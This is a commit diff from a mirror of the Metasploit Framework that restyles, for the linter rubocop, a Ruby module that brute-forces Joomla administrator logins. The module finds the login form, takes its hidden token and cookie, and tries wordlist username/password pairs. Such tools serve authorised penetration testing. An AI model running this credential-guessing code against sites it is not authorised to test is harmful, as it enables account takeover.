infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Make rubocop more happy

bug/bundler_fix
jvazquez-r7 2014-07-21 12:55:45 -05:00
parent 478e43170a
commit aefaa3dd96
1 changed files with 86 additions and 89 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

175
modules/auxiliary/scanner/http/joomla_bruteforce_login.rb
View File

@ -6,7 +6,6 @@
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::AuthBrute
@ -26,17 +25,17 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
OptPath.new('USERPASS_FILE', [ false, "File containing users and passwords separated by space, one pair per line",
File.join(Msf::Config.data_directory, "wordlists", "http_default_userpass.txt") ]),
OptPath.new('USER_FILE', [ false, "File containing users, one per line",
File.join(Msf::Config.data_directory, "wordlists", "http_default_users.txt") ]),
OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line",
File.join(Msf::Config.data_directory, "wordlists", "http_default_pass.txt") ]),
OptString.new('AUTH_URI', [ true, "The URI to authenticate against", "/administrator/index.php" ]),
OptString.new('FORM_URI', [ true, "The FORM URI to authenticate against" , "/administrator"]),
OptString.new('USER_VARIABLE', [ true, "The name of the variable for the user field", "username"]),
OptString.new('PASS_VARIABLE', [ true, "The name of the variable for the password field" , "passwd"]),
OptString.new('WORD_ERROR', [ true, "The word of message for detect that login fail","mod-login-username"])
OptPath.new('USERPASS_FILE', [false, 'File containing users and passwords separated by space, one pair per line',
File.join(Msf::Config.data_directory, 'wordlists', 'http_default_userpass.txt')]),
OptPath.new('USER_FILE', [false, 'File containing users, one per line',
File.join(Msf::Config.data_directory, 'wordlists', "http_default_users.txt")]),
OptPath.new('PASS_FILE', [false, 'File containing passwords, one per line',
File.join(Msf::Config.data_directory, 'wordlists', 'http_default_pass.txt')]),
OptString.new('AUTH_URI', [true, 'The URI to authenticate against', '/administrator/index.php']),
OptString.new('FORM_URI', [true, 'The FORM URI to authenticate against' , '/administrator']),
OptString.new('USER_VARIABLE', [true, 'The name of the variable for the user field', 'username']),
OptString.new('PASS_VARIABLE', [true, 'The name of the variable for the password field' , 'passwd']),
OptString.new('WORD_ERROR', [true, 'The word of message for detect that login fail', 'mod-login-username'])
], self.class)
register_autofilter_ports([80, 443])
@ -46,18 +45,18 @@ class Metasploit3 < Msf::Auxiliary
if datastore['AUTH_URI'] && datastore['AUTH_URI'].length > 0
paths = [datastore['AUTH_URI']]
else
paths = %W{
paths = %w(
/
/administrator/
}
)
end
paths.each do |path|
begin
res = send_request_cgi({
'uri' => path,
'method' => 'GET'
})
res = send_request_cgi(
'uri' => path,
'method' => 'GET'
)
rescue ::Rex::ConnectionError
next
end
@ -68,10 +67,10 @@ class Metasploit3 < Msf::Auxiliary
path = res.headers['Location']
vprint_status("#{rhost}:#{rport} - Following redirect: #{path}")
begin
res = send_request_cgi({
res = send_request_cgi(
'uri' => path,
'method' => 'GET'
})
)
rescue ::Rex::ConnectionError
next
end
@ -81,38 +80,38 @@ class Metasploit3 < Msf::Auxiliary
return path
end
return nil
nil
end
def target_url
proto = "http"
proto = 'http'
if rport == 443 || ssl
proto = "https"
proto = 'https'
end
"#{proto}://#{rhost}:#{rport}#{@uri.to_s}"
"#{proto}://#{rhost}:#{rport}#{@uri}"
end
def run_host(ip)
vprint_status("#{rhost}:#{rport} - Searching Joomla authentication URI...")
@uri = find_auth_uri
if !@uri
unless @uri
vprint_error("#{rhost}:#{rport} - No URI found that asks for authentication")
return
end
@uri = "/#{@uri}" if @uri[0,1] != "/"
@uri = "/#{@uri}" if @uri[0, 1] != '/'
vprint_status("#{target_url} - Attempting to login...")
each_user_pass { |user, pass|
each_user_pass do |user, pass|
do_login(user, pass)
}
end
end
def do_login(user, pass)
vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'")
response = do_web_login(user,pass)
response = do_web_login(user, pass)
result = determine_result(response)
if result == :success
@ -129,7 +128,7 @@ class Metasploit3 < Msf::Auxiliary
:duplicate_ok => true,
:active => true
)
return :abort if (datastore['STOP_ON_SUCCESS'])
return :abort if datastore['STOP_ON_SUCCESS']
return :next_user
else
vprint_error("#{target_url} - Failed to login as '#{user}'")
@ -138,74 +137,72 @@ class Metasploit3 < Msf::Auxiliary
end
def do_web_login(user, pass)
begin
user_var = datastore['USER_VARIABLE']
pass_var = datastore['PASS_VARIABLE']
user_var = datastore['USER_VARIABLE']
pass_var = datastore['PASS_VARIABLE']
referer_var = "http://#{rhost}/administrator/index.php"
referer_var = "http://#{rhost}/administrator/index.php"
vprint_status("#{target_url} - Searching Joomla Login Response...")
res = get_login_response
vprint_status("#{target_url} - Searching Joomla Login Response...")
res = login_response
unless res && res.code = 200 && !res.get_cookies.blank?
vprint_error("#{target_url} - Failed to find Joomla Login Response")
return nil
unless res && res.code = 200 && !res.get_cookies.blank?
vprint_error("#{target_url} - Failed to find Joomla Login Response")
return nil
end
vprint_status("#{target_url} - Searching Joomla Login Form...")
hidden_value = get_login_hidden(res)
if hidden_value.nil?
vprint_error("#{target_url} - Failed to find Joomla Login Form")
return nil
end
vprint_status("#{target_url} - Searching Joomla Login Cookies...")
cookie = get_login_cookie(res)
if cookie.blank?
vprint_error("#{target_url} - Failed to find Joomla Login Cookies")
return nil
end
vprint_status("#{target_url} - Login with cookie ( #{cookie} ) and Hidden ( #{hidden_value}=1 )")
res = send_request_login(
'user_var' => user_var,
'pass_var' => pass_var,
'cookie' => cookie,
'referer_var' => referer_var,
'user' => user,
'pass' => pass,
'hidden_value' => hidden_value
)
if res
vprint_status("#{target_url} - Login Response #{res.code}")
if res.redirect? && res.headers['Location']
path = res.headers['Location']
vprint_status("#{target_url} - Following redirect to #{path}...")
res = send_request_raw(
'uri' => path,
'method' => 'GET',
'cookie' => "#{cookie}"
)
end
end
vprint_status("#{target_url} - Searching Joomla Login Form...")
hidden_value = get_login_hidden(res)
if hidden_value.nil?
vprint_error("#{target_url} - Failed to find Joomla Login Form")
return nil
end
vprint_status("#{target_url} - Searching Joomla Login Cookies...")
cookie = get_login_cookie(res)
if cookie.blank?
vprint_error("#{target_url} - Failed to find Joomla Login Cookies")
return nil
end
vprint_status("#{target_url} - Login with cookie ( #{cookie} ) and Hidden ( #{hidden_value}=1 )")
res = send_request_login({
'user_var' => user_var,
'pass_var' => pass_var,
'cookie' => cookie,
'referer_var' => referer_var,
'user' => user,
'pass' => pass,
'hidden_value' => hidden_value
})
if res
vprint_status("#{target_url} - Login Response #{res.code}")
if res.redirect? && res.headers['Location']
path = res.headers['Location']
vprint_status("#{target_url} - Following redirect to #{path}...")
res = send_request_raw({
'uri' => path,
'method' => 'GET',
'cookie' => "#{cookie}"
})
end
end
return res
return res
rescue ::Rex::ConnectionError
vprint_error("#{target_url} - Failed to connect to the web server")
return nil
end
end
def send_request_login(opts = {})
res = send_request_cgi({
res = send_request_cgi(
'uri' => @uri,
'method' => 'POST',
'cookie' => "#{opts['cookie']}",
'headers' =>
{
'Referer' => opts['referer_var']
'Referer' => opts['referer_var']
},
'vars_post' => {
opts['user_var'] => opts['user'],
@ -216,7 +213,7 @@ class Metasploit3 < Msf::Auxiliary
'return' => 'aW5kZXgucGhw',
opts['hidden_value'] => 1
}
})
)
res
end
@ -233,12 +230,12 @@ class Metasploit3 < Msf::Auxiliary
end
end
return :fail
:fail
end
def get_login_response
def login_response
uri = normalize_uri(datastore['FORM_URI'])
res = send_request_cgi!({'uri' => uri, 'method' => 'GET'})
res = send_request_cgi!('uri' => uri, 'method' => 'GET')
res
end
@ -257,12 +254,12 @@ class Metasploit3 < Msf::Auxiliary
vprint_status("#{target_url} - Testing Joomla 2.5 Form...")
form = res.body.split(/<form action=([^\>]+) method="post" id="form-login"\>(.*)<\/form>/mi)
if form.length == 1 #is not Joomla 2.5
if form.length == 1 # is not Joomla 2.5
vprint_status("#{target_url} - Testing Form Joomla 3.0 Form...")
form = res.body.split(/<form action=([^\>]+) method="post" id="form-login" class="form-inline"\>(.*)<\/form>/mi)
end
if form.length == 1
if form.length == 1 # is not Joomla 3
vprint_error("#{target_url} - Last chance to find a login form...")
form = res.body.split(/<form id="login-form" action=([^\>]+)\>(.*)<\/form>/mi)
end
@ -276,7 +273,7 @@ class Metasploit3 < Msf::Auxiliary
valor_input_id = input_id[1]
return valor_input_id
valor_input_id
end
end